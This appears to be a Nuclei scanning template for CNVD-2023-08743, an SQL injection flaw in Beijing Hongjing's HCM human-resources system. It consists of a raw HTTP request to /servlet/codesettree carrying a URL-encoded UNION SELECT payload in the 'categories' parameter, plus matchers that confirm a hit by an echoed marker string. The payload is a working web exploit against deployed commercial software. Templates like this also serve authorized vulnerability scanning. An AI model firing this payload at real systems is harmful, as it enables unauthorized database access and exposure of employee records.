id: CNVD-2023-08743
info:
  name: 宏景HCM categories SQL注入
  author: weehhd
  severity: high
  description: 北京宏景世纪软件股份有限公司人力资源信息管理系统存在SQL注入漏洞
  reference:
    - https://f5.pm/go-166326.html
  tags: tags
requests:
  - raw:
      - |+
        GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hellohongjingHcm~27~2c~40~40version~2d~2d HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.58
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
        Cookie: JSESSIONID=E369F5D4165AA5A1134FFF6EF13594E4
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - hellohongjingHcm
      - type: word
        part: header
        words:
          - '200'
